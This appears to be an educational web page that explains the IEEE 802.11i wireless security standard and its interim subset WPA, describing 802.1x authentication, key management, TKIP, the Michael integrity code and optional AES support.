|
The
Institute of Electrical & Electronics Engineers (IEEE) 802.11i wireless
networking standard specifies improvements to wireless security. The 802.11i
standard was ratified in June 2004. The 802.11i standard addresses many
of the security issues of the original 802.11 standard. While the new IEEE
802.11i standard was being ratified, wireless vendors agreed on an
interoperable interim standard known as Wi-Fi Protected Access (WPA).
Thus WPA is a subset of 802.11i.
WPA was created by the
Wi-Fi Alliance in 2002 – in part out of impatience with the slow-moving 802.11i
standard.
Most WPA Wi-Fi equipment can be upgraded to 802.11i with a simple firmware
update (download from manufacturer).
WPA includes the following five features.
1. WPA authentication
802.1x authentication is required in WPA. In the 802.11 standard, 802.1x
authentication was optional.
For environments without a Remote Authentication Dial-In User Service (RADIUS)
infrastructure, WPA supports the use of a preshared key.
Caution! with preshared keys.
See this article in
Resources/Wireless Networking: WPA - An accident waiting to happen
For environments with a RADIUS infrastructure, Extensible Authentication
Protocol (EAP) and RADIUS is supported.
2. WPA key management
With 802.1x, the rekeying of unicast encryption keys is optional. Additionally,
802.11 and 802.1x provide no mechanism to change the global encryption key used
for multicast and broadcast traffic. With WPA, rekeying of both unicast and
global encryption keys is required. For the unicast encryption key, the
Temporal Key Integrity Protocol (TKIP) changes the key for every frame, and the
change is synchronized between the wireless client and the wireless access
point (AP). For the global encryption key, WPA includes a facility for the
wireless AP to advertise the changed key to the connected wireless clients.
3. Temporal Key Integrity Protocol (TKIP)
For 802.11, Wired Equivalent Privacy (WEP) encryption is optional. For WPA,
encryption using TKIP is required. TKIP replaces WEP with a new encryption
algorithm that is stronger than the WEP algorithm but that uses the calculation
facilities present on existing wireless devices to perform encryption
operations. TKIP also provides for the following:
-
The verification of the security configuration after the encryption keys are
determined.
-
The synchronized changing of the unicast encryption key for each frame.
-
The determination of a unique starting unicast encryption key for each
preshared key authentication.
4. Michael
With 802.11 and WEP, data integrity is provided by a 32-bit integrity check
value (ICV) that is appended to the 802.11 payload and encrypted with
WEP. Although the ICV is encrypted, you can use cryptanalysis to change bits in
the encrypted payload and update the encrypted ICV without being detected by
the receiver.
With WPA, a method known as Michael specifies a new algorithm that
calculates an 8-byte message integrity code (MIC) using the
calculation facilities available on existing wireless devices. The MIC is
placed between the data portion of the IEEE 802.11 frame and the 4-byte ICV.
The MIC field is encrypted together with the frame data and the ICV.
Michael also helps provide replay protection. A new frame counter in the IEEE
802.11 frame helps prevent replay attacks.
5. AES support
WPA defines the use of Advanced Encryption Standard (AES) as an additional
replacement for WEP encryption. Because you may not be able to add AES support
through a firmware update to existing wireless equipment, support for AES is
optional and is dependant on vendor driver support.
|
